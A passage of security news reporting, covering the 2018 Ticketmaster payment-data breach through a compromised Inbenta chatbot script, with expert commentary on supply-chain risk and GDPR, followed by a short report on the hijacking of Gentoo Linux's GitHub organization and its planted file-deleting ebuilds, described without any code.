Details of the hack have not yet been disclosed other than that it involved "an unknown third-party". The statement says that the company identified malicious software on a support product hosted by Inbenta Technologies (part of Ticketmaster's supply chain). It did this on Saturday, June 23, and immediately "disabled the Inbenta product across all Ticketmaster websites."

Ticketmaster clearly feels that Inbenta is at fault. Inbenta takes a slightly different view. In its own statement, CEO Jordi Torras writes, "it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements." The attackers located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.

But Torras adds, "Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability." In other words, it is Ticketmaster that is at fault.

James Romer, chief security architect at SecureAuth + Core Security, explains, "a customer service chatbot was compromised by malware and exported UK customers' data to an unknown third-party." In fact, the breach could extend to other nations. While Ticketmaster says, "we understand that only certain UK customers" are affected, it also says it is notifying all Ticketmaster International customers (outside of the U.S.) that they need to reset their passwords.

Ticketmaster has further concerns to consider. According to Monzo -- an online-only bank based in East London -- it warned Ticketmaster about a potential breach in early April. Monzo had detected fraudulent card activity that seemed to point to a Ticketmaster common factor. In a blog posted Thursday by Natasha Vernier, Monzo's head of financial crime, she explains that the bank reached out to Ticketmaster, and on 12 April, "members of the Ticketmaster security team visited the Monzo office so we could share the information we'd gathered. They told us they'd investigate internally."

Within a week, Monzo was sufficiently concerned and certain that it shared its information with the U.S. Secret Service, and started to proactively replace every Monzo customer card that had been used at Ticketmaster (about 6000).

One week after its security team visited Monzo's offices, Ticketmaster informed Monzo that it had found no evidence of a breach and that no other banks were reporting similar patterns. The breach wasn't actually found until some ten weeks after Monzo first raised its concerns.

"There are going to be a few eyebrows raised this morning about this breach and when Ticketmaster really discovered it," comments Tony Pepper, CEO and co-founder at Egress. "Clearly data was at risk for some time, and apparently Ticketmaster had been alerted to the issue but didn't heed those warnings. It is going to be interesting to see how the ICO reacts when they get to the bottom of this, given the emphasis now placed on data breach reporting and reflected in the changes made under the GDPR."

This was a supply chain attack that took a long time to detect even when the company was told it had been breached. Supply chain attacks are increasing. "It's not uncommon for companies to be breached via a third-party supplier, which is why it's important to carefully consider who to work with and what security protocols they have in place," comments Andrew Bushby, UK director at Fidelis Cybersecurity.

It's worth noting that the UK government's new Minimum Cyber Security Standard for government departments actually specifies that the supply chain should be required to meet the UK's Cyber Essentials level 6.

Joseph Carson wonders whether artificial intelligence will become embroiled in the case. "Many companies are using chat bots to help automate their customer experiences, having been lured into fancy buzzwords like machine learning, artificial intelligence and virtual assistance," he notes. While the theft of personal details, financial information and passwords means these are now available on the darknet for cybercriminals to abuse, he wonders what else might have been stolen. "It will be interesting to learn," he suggests, "whether the cybercriminals also accessed the artificial intelligence information that could be used for a more targeted type of attack."

The danger to victims of this breach is primarily twofold: fraudulent use of the stolen payment details, and more calculated identity theft. "The fact that payment card information has been caught up in this breach is hugely concerning," comments Brooks Wallace, Head of EMEA for Trusted Knight. "In cases like this, details often end up for sale on the dark web, rather than in the hands of the original hackers themselves, and then end up being used for fraudulent transactions and in some cases identity theft.

"When used to make transactions, fraudsters often start by testing small transactions here to make sure it works and then ramp up to bigger purchases. Anyone who thinks they may have been caught up in this breach needs to keep a very careful eye on their bank accounts and potentially should contact their bank to change their cards." In reality, any customer of Ticketmaster, whether a victim of this breach or not, will need to be wary of the inevitable opportunistic phishing emails that follow any such breach.

One aspect of this breach will only become clear over time: how the European data protection regulators will react in relation to the General Data Protection Regulation. It's a moot point, since the actual breach occurred prior to the activation of GDPR, although internal recognition and victim notification both occurred under GDPR. The UK's ICO will probably treat the case similarly to the Dixons Carphone breach: "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts."


Hackers Plant Malicious Code on Gentoo Linux GitHub Page
29.6.2018 securityweek 
Virus

Developers of the Gentoo Linux distribution warned users on Thursday that one of the organization’s GitHub accounts was compromised and that malicious code had been planted by the attackers.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there. We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,” Gentoo said on its website.

According to Gentoo developer Francisco Blas Izquierdo Riera, the attacker replaced the portage and musl-dev trees with malicious ebuilds designed to remove all files from a system. However, the developer says the code doesn’t actually work as intended in its current form.

Ebuilds are bash scripts used by Gentoo Linux for its Portage software management system.

Gentoo pointed out that code hosted on its own infrastructure is not impacted and the Gentoo repository mirrors are hosted in a separate GitHub account that does not appear to be affected by the breach.

“Since the master Gentoo ebuild repository is hosted on our own infrastructure and since Github is only a mirror for it, you are fine as long as you are using rsync or webrsync from gentoo.org,” users have been told.

Gentoo users have been advised not to utilize any ebuilds obtained from the compromised GitHub account prior to 18:00 GMT on June 28, 2018. GitHub has suspended the hacked account.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.